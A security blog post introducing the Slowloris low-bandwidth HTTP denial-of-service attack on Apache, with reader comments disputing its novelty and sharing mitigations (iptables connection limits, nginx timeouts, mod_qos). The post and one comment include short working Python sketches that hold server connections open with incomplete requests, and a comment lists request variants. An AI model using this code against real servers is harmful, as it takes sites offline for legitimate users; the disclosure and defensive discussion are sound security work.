web application security lab

Slowloris HTTP DoS

UPDATE: Amit Klein pointed me to a post by Adrian Ilarion Ciobanu, written in early 2007, that perfectly describes this denial of service attack. It was also described in 2005 in the “Programming Model Attacks” section of Apache Security. So although no tool was released at the time, these two still technically deserve all the credit for this. I apologize for having missed them.

As you may recall, a few weeks back I talked about how denial of service can be used for hacking, and not just as yet another script kiddy tool. Well, I wasn’t speaking totally hypothetically. A month or so ago, I was pondering Jack Louis (RIP) and Robert E. Lee’s Sockstress, and I got the feeling that other unrelated low-bandwidth attacks were possible. Then I randomly started thinking about the way Apache works and figured out that it might be possible to create something similar to a SYN flood, but in HTTP.

Slowloris was born. It works by keeping an HTTP session alive indefinitely (or as long as possible) and repeating that process a few hundred times. In my testing against an unprotected, lone Apache server, you can expect to take it offline in a few thousand packets or less on average, and the server comes back as soon as you kill the process. It also has some stealth features, including a method of bypassing HTTPReady protection. Why is this noteworthy?
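The core trick can be sketched in a few lines. To be clear, this is an illustrative mock-up of the idea, not the actual slowloris.pl code - the header names, timings, and connection counts here are my assumptions for the example:

```python
# Sketch of the Slowloris idea: open many sockets, send an incomplete
# HTTP request on each, then trickle one bogus header at a time so the
# server keeps every worker waiting for a request that never finishes.
import socket
import time

def partial_request(host):
    # Note: no terminating blank line, so the request is never complete.
    return ("GET / HTTP/1.1\r\n"
            "Host: %s\r\n"
            "User-Agent: slow-client\r\n" % host)

def keepalive_header(n):
    # One more bogus header; the blank line ending the request never comes.
    return "X-a: %d\r\n" % n

def attack(host, port=80, conns=200, interval=10):
    socks = []
    for _ in range(conns):
        s = socket.create_connection((host, port))
        s.send(partial_request(host).encode())
        socks.append(s)
    n = 0
    while True:  # keep each connection alive indefinitely
        n += 1
        for s in socks:
            s.send(keepalive_header(n).encode())
        time.sleep(interval)
```

Each connection costs the attacker almost nothing, but ties up one Apache worker until the server’s timeout fires - and the periodic bogus header resets that clock.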

Typical flooding attacks require tons and tons of packets and end up denying service to other applications as a result. By creating a flood of TCP requests, sure you can take down an upstream router, or a web server, but it’s overkill if you really just want to take down a single website. Slowloris does this without sending an overabundance of TCP or HTTP traffic, and it does so without increasing the load significantly, or in any other way hurting the box (assuming other things aren’t tied to the HTTP processes - like a database for instance). This appears to only affect certain types of webservers (generally those that thread processes, like Apache, but not like IIS).

So I contacted Apache a week ago, because I was a little concerned that I hadn’t heard much about this, other than one conversation with HD Moore about a similar attack he encountered using a different payload. I expected a well thought through response, given their dominance in the server market and the fact that I gave them an early copy of the code. Alas:

DoS attacks by tying up TCP connections are expected. Please see:


Regards, Joe

Yes, that was the entire response. So, while RTFM is a perfectly valid response on the Internet, it’s also extremely short-sighted, because almost no servers are configured properly - or if they are, it’s as a side effect of needing load balancing or something upstream that happens to protect them. Also, if you actually read that Apache.org page, it really doesn’t cover this attack at all. And Joe sorta missed the boat, or at least mis-typed in his brevity, because this isn’t a TCP DoS, it’s an HTTP DoS. If your server used UDP and I re-wrote Slowloris to speak UDP, it would work too. The best example of how this differs from a TCP DoS is that other unrelated services are unaffected, and you can still connect to them like you normally would.

The reason this works is that the web server will patiently wait well beyond what is reasonable, allowing an attacker to consume all of the available threads, of which there are a finite amount. That makes it a web server problem, not an OS or networking problem, although there may be OS or network solutions to Apache’s default configuration issues. This is further evidenced by the fact that IIS isn’t vulnerable to Slowloris in its current incarnation. Even if Apache and IIS are on the same physical box, Apache will be affected but IIS will not. That leads me to believe it’s an architectural flaw in Apache’s default design. Though this isn’t just Apache’s problem, to be fair - other web servers are vulnerable as well, although none come close to Apache in terms of market share. You can find more information on the Slowloris page.

Anyway, I hope this gets people thinking about better web server architecture - especially if this is “expected” behavior of their web server - and at least offering a default configuration that can protect against this sort of attack, instead of making admins jump through a bunch of convoluted hoops. I thought it would be better to open this up for discussion, so I encourage you to try out the tool in QA or staging and see how your web server handles it. The software is very beta though, so do not use it against anything in production - I make no warranties about its ability to do anything outside of a lab environment!

143 Responses to “Slowloris HTTP DoS”

  1. sirdarckcat Says:

    I understand why Joe sent you that message, and I think that after reading this post he would send it again.

    Apache MaxClients DoS attacks - abusing Content-Length, the Keep-Alive header, sending a lot of small headers with a timer, etc. - have been well-known attacks for quite some time.

    Maybe I missed something, is there anything I missed?

  2. RSnake Says:

    @sirdarckcat - Slowloris can defeat all of those protections, with the possible exception of the experimental modules (if you want to take the risk of installing something that isn’t production ready). Well known or not, neither default Apache nor tuning each of those items does much to stop Slowloris, since it can be tuned to compensate.

    The point is even if it was fixable, it’s not default and few webmasters if any will change it. Also, by increasing max clients you are only delaying the inevitable. Slowloris will still win eventually. It may take 1000 threads instead of 200, but whatever.

    If you can point me to the “well known” attack code, I’d love to see it.

  3. thrill Says:

    The failure of most programmers is thinking that their knowledge of the code >= the knowledge of the attacker. Hence the reason why someone would just tell you to ‘buzz off’ in not so many words.

    But it is a failure at 2 different levels because the attacker is concentrating on a single purpose; to defeat the programmer. So if the programmer cannot be open minded and realize that “hey, someone figured something out that I didn’t think about”, then their software is bound to fail. Just ask Microsoft about that.


  4. sirdarckcat Says:

    Which protections?

    What I listed are names of attacks. In order to exhaust Apache’s MaxClients by delaying the timeout, you can do several things:

    1.- send a content-length header without sending enough data
    2.- use the keep-alive header and an incomplete request
    3.- send a lot of small headers very slow
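    All three variants boil down to a request the server considers unfinished. A minimal sketch - host names, sizes, and header names here are illustrative, not from any real tool:

```python
# Sketches of the three timeout-delaying requests listed above.
# Host names, sizes, and header names are illustrative.

# 1.- Content-Length promising a body that never fully arrives:
content_length_variant = (
    "POST / HTTP/1.1\r\n"
    "Host: victim\r\n"
    "Content-Length: 1000000\r\n"
    "\r\n"
    "x"  # send one byte, then go quiet
)

# 2.- Keep-Alive plus an incomplete request (no terminating blank line):
keep_alive_variant = (
    "GET / HTTP/1.1\r\n"
    "Host: victim\r\n"
    "Connection: keep-alive\r\n"
)

# 3.- Many small headers, emitted one at a time with long pauses between:
def small_headers(count=1000):
    for n in range(count):
        yield "X-h%d: 1\r\n" % n  # a real client would sleep between each
```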


  5. RSnake Says:

    @sirdarckcat - the ones listed on the page Joe sent. You’re right, all three will do the job. Content-length has been seen in the wild. I haven’t seen the headers version though. But all three would work, and I may eventually add all three in, although I think Keep-Alive is an easy one to fix compared to the other two.

  6. Robert A. Says:

    The concept of establishing TCP connections to web servers and keeping them open via keep-alives/pipelining in order to perform resource exhaustion is a very well-known attack concept, and can be performed using Apache’s own ApacheBench tool (part of Apache 1.x).

    Options are:
    -n requests Number of requests to perform
    -c concurrency Number of multiple requests to make
    -k Use HTTP KeepAlive feature

    Joe’s point of TCP connections being tied up is a perfectly valid answer (albeit brief). You’re establishing a full TCP connection and DoSing based on the server’s resources/configuration, which is why Apache has MaxClients, Timeout, MaxRequestsPerChild, ThreadsPerChild, MaxSpareThreads, etc…
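    For reference, those knobs live in httpd.conf; an illustrative fragment (the values are examples, not recommendations) looks like:

```apache
# Illustrative prefork tuning - numbers are examples only
Timeout 30
KeepAlive On
KeepAliveTimeout 5
MaxClients 256
MaxRequestsPerChild 10000
```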

    Additionally you can only have so many TCP/IP connections established/open on a per machine basis, so you can still DOS a machine if you can saturate all ports (assuming the web server can handle that many concurrent requests to get to this point).

  7. id Says:

    @Robert A

    Your server configuration doesn’t matter, none of those directives will do anything in this case.

    And the number of TCP connections open is not a factor at all on any modern server.

  8. Ryan Yagatich Says:

    Not sure of the usefulness of this utility, considering ApacheBench has been able to successfully reproduce the same result for years (and includes timings).

    Maybe I missed something as well - but isn’t it clear in the documentation that the MaxClients, MaxRequestsPerChild and related threading settings are important when you configure your server?

  9. RSnake Says:

    @Ryan - ApacheBench does not send partial requests, unless you are talking about keep-alives, which Slowloris has nothing to do with.

    MaxClients and MaxRequestsPerChild don’t fix the problem, they just make Slowloris work a little harder to have the same effect. Read the comments above.

  10. Acidus Says:

    Anytime you have a single source with finite resources whose purpose is to accept anonymous connections, you can have a DoS issue. Even something as simple as using Charles Proxy to drastically drop your throughput will do this HTTP-level “attack.” I recall Patrick Stach and Sir Dystic talking about HTTP DoS attacks using keep-alives back in 2002 at a hacker con in Atlanta. It’s not lame, but let’s not make a mountain out of a molehill.

    99.99999% of web sites don’t need to worry about this. Joe’s link is valid because if you are worried it shows how to change web server setting to mitigate this as best as you can. The websites big enough to be worthy targets are already modifying things like timeouts anyway to scale for their size.

    That this should somehow be the “default configuration” is a myopic and very security-centric view. There is a reason why web servers “will patiently wait” and why we have persistent connections: performance. HTTP requests are clustered. You don’t fetch one resource; you fetch 1 HTML page, then 8 JavaScript files, then 30 images to render a page. HTTP/1.0 without the Netscape “hack” that was Keep-Alive was painful. You had to keep establishing TCP connections and dealing with slow start.

    In fact to quote (http://www.w3.org/Protocols/HTTP/Performance/Pipeline.html) “In other words, most HTTP/1.0 operations use TCP at its least efficient.” There are several other great academic papers from the 1995-1999 time frame about maximizing network utilization for HTTP connections.

    Long story short: cool, you released a tool (as an aside, how is this not arming script kiddies?). Is the idea new/novel? No, but maybe it’s not widespread, so it’s good you are spreading it. But is the house on fire? No. Should everyone do all these tweaks to be “secure” and do what you are describing? No - there is a reason it’s built that way, even if that doesn’t square with a security point of view.

  11. Acidus Says:

    sweet jesus Firefox needs to a grammar checker to tis speel checker. Or I need to learn English. Hmmm I know which is more likely ;-)

  12. BillB Says:

    What would help is a max connections per IP. MaxClients doesn’t help because they will be consumed. Same with MaxRequestsPerChild and any thread settings. Seems a little strange to me that apache doesn’t have a max connections per IP, certainly an attack with a bunch of slow connections isn’t a new one.

  13. RSnake Says:

    @All, we have now gone through and tested every single recommendation Apache has made on that page - even the scary experimental one that says it may take down your server in the process of its use - and none of them stopped Slowloris. I think we can finally move on from that part of the discussion.

    @Acidus - Agree with most of what you’re saying with a few exceptions. The Keep-Alive DoS isn’t really relevant except that it too is a DoS which has the same effect. I also never claimed the house was on fire. In fact, most big websites that really would need to worry about this are going to be more secure inherently because they use load balancers which are far less vulnerable from what I’ve seen so far. As far as arming script kiddies, if it’s not a problem/big deal then why should anyone worry about script kiddies having it? Right? However, whether it is or isn’t a big deal I do think it’s worth talking about since Apache’s recommendations are crapola. And yes, I do think there are ways to make Apache work and still have high performance - IIS has managed to do a pretty good job.

    @BillB - that’s not a bad idea. You could probably invent something like that on your own. I haven’t heard of anything quite like that though. Perhaps mod_security could use a tweak to add something like this in?

  14. gat3way Says:

    Yeah, but that’s nothing new really. You can achieve the very same result (with Apache) without even sending anything on the socket. Since the default MaxClients limit is 256, all you need is to open and connect 256 sockets to the webserver, and since there is a request timeout, you eventually need to reopen and reconnect them, depending on the server’s timeout value. Besides, Apache by default does not log anything in that case since there is no request at all (this usually makes server administrators angry :) )

    I agree Apache could provide a limit of connections from a given IP but sometimes that could become kind of a bad problem (imagine your webserver is accessed through a reverse proxy and all requests come from the proxy’s address).

    Besides, Apache by default (mpm_prefork) does not spawn new threads; it forks new processes instead. This is a lot more CPU-consuming (because of context switching) and memory-consuming as well. Thus, raising MaxClients can be devastating - it could trigger OOM kills and/or make the system unresponsive.

    Finally, what I believe is a neat solution to the problem is introducing a web caching tier in front of the apache servers and carefully setting timeout values and connection limits on the web caches. This should eliminate or at least decrease the impact of the problems you’ve described.

  15. Daniel Boteanu Says:

    In 2007 I looked at the DoS problem of SYN flood and realized that the same thing can be done at other levels in the TCP/IP stack. In the article “Queue Management as a DoS counter-measure?” (http://www.professeurs.polymtl.ca/jose.fernandez/QueueManagementDoS.pdf) we studied the theory behind this type of resource exhaustion attack under the assumption that the attack is so well set up that you are not able to tell the good requests apart from the bad. If this is not the case, then measures that try to correlate the IP addresses and other characteristics of the requests could be useful in stopping the bad guys. But when you are faced with a botnet, there might be no way to know which request is good and which is bad. The numerical application and the lab experiments in the article are mostly on TCP SYN flood, but we provided some numerical values for attacks like HTTP connection exhaustion as well. We did think of keep-alives and other means of keeping the connection up, but for simplicity we assumed that the HTTP connection would time out as well at some point, and we took the default values of popular web servers. Even with these considerations, the conclusion was that it is possible to DoS a web server with very low bandwidth.

    The fun part is that these types of attacks can be applied at higher levels than HTTP as well. For example, you could DoS an online application for buying plane tickets. The way most applications of this type work is that you choose your flight and a seat gets temporarily reserved until you complete payment. This seat is not available during this time to other users searching for flights. If you complete the payment in the allocated time, the seat is permanently reserved. Otherwise, the temporary reservation is destroyed and the seat becomes visible in searches once again. Now, these timeouts are relatively large, around 10 minutes, to allow the person that made the reservation to find the credit card and type all the required info. The basic idea behind a DoS against this system is to select all the seats available for a certain flight using multiple sessions and keep them reserved as long as possible without paying. Going back and forth in the online application might extend the timeout, depending on how the application works, but even if this is not the case, you can create a DoS on the flight with low resources.

    The protective solution that we proposed was to use a dynamic timeout mechanism, where the exact value of the timeout at a specific moment would be calculated based on the load of the server. This is better than the default permissive values of TCP/IP stacks, web servers and other applications, but it is not a panacea. For TCP/IP stacks it gives you around one order of magnitude better resilience against DoS attacks. For HTTP connections and higher-level attacks, it could be more. This is also better than using strict values by default, because when the server has plenty of resources available, slow clients can use the service without any problem.
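    As a toy illustration of the dynamic-timeout idea (the formula and constants here are illustrative, not the ones from the article):

```python
# Scale the connection timeout down as the server's slots fill up,
# so slow clients are tolerated when idle but shed under load.

def dynamic_timeout(active, max_slots, base=300.0, floor=5.0):
    load = active / max_slots        # 0.0 idle .. 1.0 saturated
    return max(floor, base * (1.0 - load))
```

    An idle server still grants the full 300s, while a saturated one drops to the 5s floor, reclaiming slots from slow (or malicious) clients.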

  16. RSnake Says:

    @gat3way - yes, but if you just open a socket and they have HTTPReady, you can’t DoS the server, in my experience. That was a specific requirement given that HTTPReady is touted as a solution to this exact problem - it’s not. But I agree with everything else you’ve said.

    @Daniel Boteanu - I’ve heard about the plane seat lockout concept before (I think Jeremiah G told me about it at one point). Very cool concept, and I can see a lot of applications for it. I like the concept of dynamic timeouts in general, because that really can be applied to every part of the OSI model.

  17. Acidus Says:

    Bryan Sullivan and I specifically talked about DoSing a plane in our Premature Ajaxulation talk in 2007.

  18. Matt Presson Says:

    Just a thought, but would MaxClientsByIP really help anything? Nmap has had a feature for years that allows you to spoof IPs when performing port scans. Along those same lines, adding a similar feature to Slowloris (love the name by the way) should easily overcome any such compensation.

  19. RSnake Says:

    @Acidus ! Whoops, sorry, that’s right. I knew it was a while ago, and Jeremiah was with me in the audience when you were talking about it. My brain works in strange ways, but yes, I think that was the first time I had heard about it.

    @Matt Presson - Unfortunately that would only work remotely if you could guess the ISNs involved, because you need the full TCP handshake for the HTTP headers to be accepted by the socket. But if you were on the same switch and could ARP spoof and sniff the traffic, sure.

  20. phoenix Says:

    What about mod_evasive or mod_bandwidth ?

    “mod_evasive is an evasive maneuvers module for Apache to provide evasive
    action in the event of an HTTP DoS or DDoS attack or brute force attack. It
    is also designed to be a detection tool, and can be easily configured to talk
    to ipchains, firewalls, routers, and etcetera.

    Detection is performed by creating an internal dynamic hash table of IP
    Addresses and URIs, and denying any single IP address from any of the following:

    - Requesting the same page more than a few times per second
    - Making more than 50 concurrent requests on the same child per second
    - Making any requests while temporarily blacklisted (on a blocking list)”


  21. RSnake Says:


    mod_bandwidth only works with Apache 1.3.

    mod_evasive does nothing to stop this unless it tells something else to firewall the user off. I didn’t try every configuration, but it doesn’t appear to do much against Slowloris unless it communicates its problems to something that has a chance of dealing with them on Apache’s behalf.

  22. lighty Says:

    Did you test Slowloris on other web server stacks?

    Like nginx, lighttpd, cherokee… which are more “high-performance” oriented web servers? Or are we just talking about an Apache-specific “DoS”?


  23. thrill Says:

    @Matt Presson

    How do you suggest blocking BySpoofedIP ? :)

  24. blah Says:

    Billy Hoffman AKA “Acidus”

    “as an aside how is this not arming script kiddies?”

    lol@arming. Maybe Bob doesn’t want to end up like you, who does nothing but yap and never releases any code. I’ve heard you more than a DOZEN times say you would release something after a talk, and you never have. You’re full of hot air. You have a rep based on talking fast.

    teh kidz already have tens of thousands of compromised machines; that’s how his PERL SCRIPT isn’t “arming” them.

  25. sirdarckcat Says:

    mod_evasive sucks, and mod_bandwidth is broken.

    your best bet is iptables and limit max simultaneous connections / ip.
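    A firewall configuration fragment along those lines might look like this (the thresholds are illustrative examples, and the rules require root):

```shell
# Cap concurrent port-80 connections per source IP; numbers are examples
iptables -I INPUT -p tcp --dport 80 -m connlimit --connlimit-above 20 \
    -j REJECT --reject-with tcp-reset
# Second layer: rate-limit NEW connections per source with the recent module
iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --set
iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent \
    --update --seconds 60 --hitcount 30 -j DROP
```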

    anyway.. I think it’s important to state clearly that what you are exhausting is Apache’s MaxClients limit (I know that you cannot fix this just by increasing the number, but that is what your attack is exhausting).

    A friend showed this to me a couple of mins ago:

    Just plain stupid, haha


  26. id Says:


    MaxClients only limits how long it takes to hang a site, and only by a few seconds max. Considering an average httpd process takes up between 3MB and 10MB of RAM, that’s only about 100-350 httpd processes per GB of RAM. And the average server probably has 4-8GB right now, so even with a very high MaxClients setting the server would run out of physical RAM with very few packets sent.

    As for the FD guy…I hope he takes his blood pressure medicine…

  27. Wireghoul Says:

    I’m surprised mod_choke hasn’t been mentioned. Is it considered too “unstable”?

    Also, spotted this typo on the slowloris page;
    In considering the ramifcations of a slow denial of service attack against

  28. Christian Folini Says:

    Very nice to see somebody write about this topic. The question has been raised on the apache users list in 2007. All we got from apache was the same stupid tips page, which ignores this particular problem completely. See the thread at http://tinyurl.com/mbkhr9

    I did some research on this, but never actually released it. If somebody is interested in it, then get in touch with me at netnea.com.

    Actually RSnake, you are going in the right direction with Slowloris. However, there is a lot of room for additional nastiness, e.g. working with file uploads instead of HTTP headers (HTTP headers limit you to a max connection duration of LimitRequestFields * Timeout); file uploads do not really have a connection duration limit. And from the way Apache works, just about anybody is allowed to _send_ in a file. Apache won’t necessarily accept it, but as a start, it will try and swallow it completely. ModSecurity could help you a bit though.

    What I have not tried out is hacking the ssl handshake. I am confident you would be able to get the same DoS effect and hide from the access log that way.

    I am happy somebody with some leverage finally made this public. I’ve been sitting on my research on the topic for too long.

  29. aykay Says:

    There is already a way to define a maximum number of connections per source IP address. You don’t even have to “tweak” mod_security to achieve that.
    As an alternative to limiting max simultaneous connections with iptables, you could use the Apache module mod_qos (http://mod-qos.sourceforge.net/).
    It can limit the number of concurrent connections for a single source IP address via the configuration option QS_SrvMaxConnPerIP.
    mod_qos can also be configured to allow a server to support keep-alive as long as sufficient connections are free, but to disable keep-alive support when a defined connection threshold (QS_SrvMaxConnClose) is reached.
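    An illustrative mod_qos fragment (the thresholds here are examples, not recommendations):

```apache
# Limit each client IP, and shed keep-alive under load - example values
QS_SrvMaxConnPerIP   20
QS_SrvMaxConnClose  150
```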

  30. phoenix Says:

    @Rsnake > I did compile mod_bandwidth on Apache 2.2 with no problem

  31. Hugo Says:

    @Rsnake, how do you protect your webserver from that? I see that my IP got blacklisted after running slowloris.pl against ha.ckers.org. I guess you’re running Apache too, right?

    The slowloris.pl manpage says “lighthttpd” is not affected; the web server’s name is actually “lighttpd”.

  32. Wladimir Palant Says:

    > Anyway, I hope this gets people thinking about better web server architecture.

    Definitely. I used to run Apache - until a year ago, when my server simply went down due to memory exhaustion. It took me some time to figure out what was going on and that it wasn’t a DoS attack. It was simply due to keep-alive being enabled on a directory that many clients downloaded a small file from. That resulted in tons of open connections (the keep-alive timeout was 150 seconds, which used to be the default I guess) that weren’t doing anything but just sitting there wasting lots of memory. This finally made me install nginx, and I still cannot believe how much difference that made. nginx uses a single-threaded approach which is both less wasteful and apparently allows for far better performance if done correctly.

  33. Ralf Says:

    It’s possible to retrieve the PID of the Apache process that serves the request:


    This may (or may not, I don’t know) be useful in Slowloris to estimate the load (e.g. many non-unique PIDs -> much load) of the server.

  34. kmike Says:

    Yes, it would be interesting to see if this type of attack is effective against state-machine-based web servers such as nginx or lighttpd.
    Also, nginx can limit the number of connections per IP (I don’t know if lighttpd has a similar feature), thus more attacking IPs are needed to achieve the same result.

  35. Zac B Says:

    Kudos on finding a problem… and kudos to the commenters finally getting over the knee jerk reaction and getting to the meat of the matter.

    Actually, I’d like to comment on the discussion (and not the DoS issue) cause I think people may miss the opportunity to learn valuable lessons from this: “fix or mitigate the problem *first*” & “don’t take it personally”.

    You don’t like that someone finds a problem? Tough. Saying that it’s nothing new and that other issues ‘do the same thing’ isn’t helping. The fact of the matter is that ‘does the same thing’ does not mean ‘does it the same way’. Fix/mitigate the new issue.

    Example (albeit extreme): Bullets kill people; poison kills people. Bullet-proof vests mitigate bullets… not so much for poison (though it does depend on the delivery mechanism for the poison). Just because the end result of these two threats are the same does not make the methods and protections the same.

    Don’t take issues personally. This is like arguing over which hammer is best… but if all you need to do is put a nail in a wall, does it really matter if you use a 14oz smooth-headed claw hammer with a wood handle instead of a 20oz drywaller’s hammer with a metal shaft? Not one bit.

    So, just cause someone finds a flaw in your favorite app/tool/os doesn’t mean they are attacking you or even your favorite app/tool/os. In fact you should greet this revelation with a smile cause usually it’ll mean things will improve.

    RSnake has done a great service to the Apache community, and I agree that the response from Apache of RTFM was insufficient.

    BTW: before you flame me for being off topic - my current specialty (aka: my day job) is Security Analyst and not Web/Server admin, so other than mastering multiple ways to say the word “no” I have to daily look at the ‘how’ of responses and see if the ‘how’ can be improved.

  36. Zac B Says:

    damn straight… though there is one other option: not to read our posts after clicking on the ’submit’ button. :P

    # Acidus Says:
    June 17th, 2009 at 11:30 am

    sweet jesus Firefox needs to a grammar checker to tis speel checker. Or I need to learn English. Hmmm I know which is more likely ;-)

  37. MaXe Says:

    Very nice RSnake, I really appreciate it when PoCs like this are released. It helps me learn and understand more about computers (and programming, no matter how poor my best hello_world() is).

    Keep up the good work!

    Best Regards,

  38. GeorgZ Says:

    I guess the actual “idea” is *really* old (> 5 years). It reminds me of Lutz Donnerhacke’s “Teergrube” (SMTP) for slowing down spammers.
    I agree that something like MaxClientsPerIp should be present in Apache, but unless you figure out why IIS behaves more “intelligently”, I would just say that Apache is more tolerant of slow clients.

  39. rvdh Says:

    There are more roads that lead to Rome:


  40. id Says:

    Couple more suggestions of “solutions” that I tested today.
    cband - nope
    MPM worker - nope
    dosevasive - couldn’t find the source, if anyone has a pointer I’ll try it.

    Also, there’s been a large percentage of posters on this, and various other forums, saying it’s a very old/well known/easily defended against issue. However, no one has posted a link to any code that does the slow and low bandwidth approach. I’d be interested to see the code, and compare the various suggested protections.

    I am also very curious to know why, if this is so well known, it isn’t commonly used in attacks (this site has had quite a few DoSings, none similar). Maybe it’s because everyone else (except every site we’ve tried) is implementing their super secret protections they aren’t sharing?

  41. Roland Dobbins Says:

    I’ve read through all of this, and through the TCP vectors discussed in the latest Phrack, and I see absolutely *nothing* new here from either a conceptual or an actualization standpoint. All these things and more have been seen in the wild for a decade or more (by me personally, I’m not reporting second- or third-hand).

    It’s good to see that folks in the security research/infosec communities are finally starting to think about DDoS and all its implications, but the concept of prior art is still apparently something few security researchers (and academics, for that matter) seem to grasp. Before investing the time and effort to write a tool which duplicates attacks seen over and over again in the wild by operational security (opsec) folks, and before making an announcement that something is new and different which in actuality has been seen and dealt with by others over and over again, a bit of due diligence ought to be undertaken, IMHO.

    Also, note that there are in fact quite a few countermeasures for dealing with such attacks, including architecture, configuration, and even dedicated DDoS mitigation devices [full disclosure; I work for a company which makes such devices]. It’s also important to note that, far from providing any materially useful security benefit, load-balancers actually tend to increase vulnerability to DDoS due to all the state they instantiate, and so it’s important to ensure that one’s various reaction mechanisms (S/RTBH, dedicated DDoS mitigation devices, et. al.) are located northbound of the load-balancers so as to protect them as well as the load-balanced instances southbound of them.

    This in no way diminishes the value of discussion.

  42. sirdarckcat Says:

    > super secret protections they aren’t sharing
    well, they are *very easy* to implement, but ok..

    In my case I’ve used several ways depending on the day (if the weather is hot, I don’t use perl; if the weather is cold, I don’t use python; so I used bash). This is an extract from a cronjob running every 5 minutes on the webserver, with a very simple script that detected plain-dumb same-IP attacks (there are further iptables rules limiting the amount of new connections per minute, so the attack of exhausting MaxClients from the same IP is impossible in less than 5 minutes):

    # bloke999 style dos
    netstat -an | grep ':80 .*ESTABLISHED' | sed 's/^.*ffff://' | tr : ' ' | awk '{a[$1]++} END{for(i in a){if(a[i]>10)print "-I INPUT -s " i " -j DROP"}}' > /home/sdc/export/iptables_bloke.txt
    # dec2006 style dos
    netstat -an | grep ':80 .*TIME_WAIT' | sed 's/^.*ffff://' | tr : ' ' | awk '{a[$1]++} END{for(i in a){if(a[i]>30)print "-I INPUT -s " i " -j DROP"}}' > /home/sdc/export/iptables_wait.txt

    I have another Python script running on the DNS server polling /server-status that does the same (at a higher frequency), but instead of dropping packets it configures the server to respond differently to those IPs, pointing the domains to (the TTL is low).

    I don’t know why no one attacks ckers.org with this technique, but at least they have attacked me, and a friend’s forum, like this several times.

    A lot of websites are easy to DoS like this. I sincerely can’t think of any public tool that does this, so I understand why the word “new” can be used to describe Slowloris.

    Anyway, :)


  43. Hugo Says:

    The remedy: http://www.hiawatha-webserver.org/

  44. Paul Says:

    @ Every limelight wanting researcher.

    Who gives a damn if it’s been discussed before? I certainly don’t. I’m just a hobbyist who’s curious about how things work, things like Apache. Robert isn’t trying to take credit. You’ll notice it wasn’t him who posted this on FD, which is a den of attention whores, skiddies who talk about how elite they are because they discovered Amazon has an XSS vuln, and fly-by-night security firms pushing their latest whitepaper.

    But I digress…

    In trying this out (I must stress, with the -test flag, not actual attacks) I found an interesting general rule: if it involves money and it’s large, 90 percent of the time it’s around 100 seconds. If it’s a personal site, only 10 percent of the time does it not go to 500.

    RSnake: I got the script to segfault. Where do I report it or possibly submit improvements, and, while I understand you’re busy, will you update this script?

  45. Charles Darke Says:

    It may well be used in ‘real’ attacks. But since reducing the timeout or using other countermeasures can defeat this attack, the attack must degenerate into a standard DoS attack to remain effective.

  46. RSnake Says:

    @Paul - do you mean that Perl segfaulted? I don’t see how my program could manage to do that by itself. But yes, if there’s some changes that would make the program better, just email them to me. My email address is on the about us page.

    And welcome slashdot!

  47. Paul Says:

    It could have. I just set it up on the box I was testing on and haven’t set up Perl in a while. It was probably one of the script’s dependencies. It could also have been the fact that I was running it through torify, to see if it would be feasible to do this attack through Tor (providing an instant proxy).

    I’ll try to reproduce it. Thanks. And don’t listen to the kids saying you ripped off others’ work.

    And congrats on being slashdotted (again, IIRC). I have your blog RSS’d so I had it first :)

  48. EternaL Says:

    Oh my god, what a nice tool !!!

    Great job dude, really surprised you share it for free.
    Anyway, good work!


  49. RSnake Says:

    Apache’s take on this issue (part two) - still not worth thinking about. They closed the bug that this guy opened: https://issues.apache.org/bugzilla/show_bug.cgi?id=47386

  50. karavelov Says:

    I have tested this DoS attack against lighttpd and nginx. Out of the box both servers are vulnerable (despite the note in the announcement that lighttpd is not vulnerable; just use a large enough number of connections). Nginx can be configured to not be affected by this type of attack:
    Put in the “http” section:

    client_body_timeout 10;
    client_header_timeout 10;
    keepalive_timeout 10;
    send_timeout 10;
    limit_zone limit_per_ip $binary_remote_addr 1m;

    # and put in the "server" section:
    limit_conn limit_per_ip 16;

    the last line limits the number of connections per client IP.

    Maybe lighttpd can be configured in a similar manner, but I am not an expert in it.

    Best regards

  51. RSnake Says:

    Incidentally we have a new working theory. Our theory is that no Apache module as it stands right now can fix this. We tried mod_security’s “drop” on a single IP address, which should send a FIN immediately upon seeing that IP address. Unfortunately it too was unable to stop this. I think possibly the Apache modules are just called too late. We tried the same thing with .htaccess denys but that only denies once the connection is complete, and mod_security runs after .htaccess. I can’t confirm this theory but maybe someone who is more familiar with Apache internals can.

  52. RSnake Says:

    Ivan Ristic confirmed that mod_security runs too late, although it still might be possible to write a module that can defend against this. He also confirmed that there are no good workarounds built into any existing modules that he is aware of - or even to simpler DoS scenarios as well. It’s been something he’s wanted to write, but it doesn’t currently exist.

  53. RSnake Says:

    @karavelov - can you tell us what configuration of Slowloris you used? Perhaps my defaults weren’t well suited for attacking those…?

  54. Joe Says:

    Why wouldn’t setting keep-alives to a lower number help here?

  55. Wireghoul Says:

    @RSnake @id

    Did you try mod_choke? If your distro doesn’t already have it, consult http://modules.apache.org/ for source

  56. RSnake Says:

    @Wireghoul - nope but we can try it out.

    For those if you who are following this we’ve looked at pretty much everything you can possibly do with your Apache config and we’ve been trying all of your suggestions. One guy on slashdot mentioned this configuration so we tried it out and it looks like it solves the _default_ Slowloris attack:

    Timeout 5
    KeepAliveTimeout 0

    The problem is if you set -timeout to 4, Slowloris wins again (assuming fairly low latency). It’s all about how long you allow the socket to stay open. Doing this will break all kinds of stuff though, as Acidus mentioned above.
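    To make the timing argument concrete, here is a minimal sketch of the technique being discussed; it is not RSnake’s actual Perl, just an illustrative Python reduction of the same idea. The request head is never finished, and a bogus header line is trickled out at an interval just under the server’s Timeout, so the read timer keeps resetting. The host, port, and the `X-a: b` header are placeholders; only run anything like this against a server you control.

```python
import socket
import time

def build_partial_request(host):
    """A request head that is deliberately never finished: the final
    blank line (CRLF CRLF) is withheld, so the server keeps reading."""
    return b"GET / HTTP/1.1\r\nHost: " + host.encode() + b"\r\n"

def trickle(sock, interval, rounds):
    """Send one bogus header line per interval; on servers that reset
    their read timer on every byte received, this holds the worker
    slot open for as long as the trickle continues."""
    for _ in range(rounds):
        time.sleep(interval)
        sock.sendall(b"X-a: b\r\n")

# Usage sketch (against a host you control):
#   s = socket.create_connection(("localhost", 80))
#   s.sendall(build_partial_request("localhost"))
#   trickle(s, interval=4, rounds=100)  # 4-second gaps beat "Timeout 5"
```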

  57. Tim McGuire Says:

    I tested this against Tomcat and, as expected, it works great (from VMware).

  58. Ed Says:

    How is this possible ?

    “If your server used UDP and I re-wrote Slowloris to speak UDP it would work too.”


  59. RSnake Says:

    @Ed MINA is just one example - http://www.ashishpaliwal.com/blog/2008/10/what-is-apache-mina/ Most of the UDP web servers I’ve seen are experimental. I was only speaking hypothetically.

  60. Ed Says:

